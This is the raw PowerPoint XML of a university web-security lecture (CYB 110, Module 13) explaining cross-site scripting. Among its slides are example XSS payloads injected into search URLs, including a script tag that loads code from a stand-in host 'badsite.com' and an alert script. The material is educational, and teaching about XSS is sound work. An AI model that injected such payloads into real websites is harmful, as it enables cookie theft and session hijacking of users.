                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="9218" r="4445" b="5350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4229100" y="-1"/>
            <a:ext cx="4914900" cy="4394201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3766228524"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483653" r:id="rId1"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" kern="1200" cap="all">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Rockwell"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Rockwell"/>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ext Placeholder 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972000" y="928800"/>
            <a:ext cx="7588450" cy="3319200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level </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4356881"/>
            <a:ext cx="9144000" cy="754063"/>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schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="297219" y="3824671"/>
            <a:ext cx="579961" cy="1112897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Title Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>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9266" y="4013390"/>
            <a:ext cx="2882086" cy="1441043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0941004A-AE3D-469F-B149-2CAFD63E8F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926984" y="4503079"/>
            <a:ext cx="6581164" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>©2021 by Dr.  Jim Alves-Foss and Dr. Jia Song. This document is licensed with a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Creative Commons Attribution-Non-Commercial-Share Alike 4.0 International License (CC BY-NC-SA 4.0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId9"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120518918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Lst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="0" i="0" kern="1200" cap="all">
          <a:solidFill>
            <a:srgbClr val="A27E55"/>
          </a:solidFill>
          <a:latin typeface="Rockwell"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="2160"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="900"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A27E55"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buNone/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:srgbClr val="6E6E6E"/>
          </a:solidFill>
          <a:latin typeface="Helvetica"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="377190" indent="-171450" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="1710"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="900"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A27E55"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:srgbClr val="6E6E6E"/>
          </a:solidFill>
          <a:latin typeface="Helvetica"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="514350" indent="-123444" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="1560"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="450"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A27E55"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1800" kern="1200" baseline="0">
          <a:solidFill>
            <a:srgbClr val="6E6E6E"/>
          </a:solidFill>
          <a:latin typeface="Helvetica"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="692658" indent="-144018" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="1485"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="450"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A27E55"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1600" kern="1200" baseline="0">
          <a:solidFill>
            <a:srgbClr val="6E6E6E"/>
          </a:solidFill>
          <a:latin typeface="Helvetica"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="898398" indent="-116586" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPts val="1260"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A27E55"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="6E6E6E"/>
          </a:solidFill>
          <a:latin typeface="Helvetica"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1714500" indent="0" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buNone/>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example.com/search?input=" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exame.com/search?input=word" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.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5259" y="1711614"/>
            <a:ext cx="7252634" cy="1170886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CYB 110</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cybersecurity and privacy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Module 13 - web security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Jim Alves-Foss and Jia Song</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3558998047"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="12391"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="1239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E0A9-0A81-6E41-B9EC-090884441AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D43BC622-1A91-0943-9FD9-428950CDE11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{795F3755-A240-0348-BA3D-3AD61A90BE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689912" y="4263112"/>
            <a:ext cx="4194876" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Ref: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>/www-community/attacks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215527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a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricking a client or server into executing scripted code by including the code in data inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts and HTML tags are encoded as plaintext just like user inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross+site+scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>&amp;oq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cross+site+s&amp;aqs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=chrome.0.0j69i4.90j8&amp;sourceid=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chrome&amp;ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://www.google.com/search?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;SCRIPTSRC=http://badsite.com/xss.js&gt;&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;q=cross+site+scripting&amp;ie=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:official&amp;client=firefox-a&amp;lr=lang_en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1667106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30851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E62790-9E71-9C44-8323-BF4AA5FCAF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209524" y="919573"/>
            <a:ext cx="3640500" cy="3807411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In XSS, an attacker injects his/her malicious code to the victim’s browser via the target website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>When code comes from a website, it is considered as trusted with respect to the website, so it can access and change the content on the pages, read cookies belonging to the website and sending out requests on behalf of the user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arc 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813303" y="1456841"/>
            <a:ext cx="1852046" cy="945396"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16062036"/>
              <a:gd name="adj2" fmla="val 2358492"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="1270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14" y="1360197"/>
            <a:ext cx="4819710" cy="2736224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3412010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971A-BC19-E94C-BF11-262B7A0C9872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A simple XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3AA9A3-014E-B343-87A5-AFC721D9326C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Assume a vulnerable service on website: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>cybersecurity, where “cybersecurity” is provided by the users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.example.com/search?input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&lt;script&gt;alert(“attack”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696DDBA1-E4F0-6F41-906B-48BC499D8180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992883" y="1861400"/>
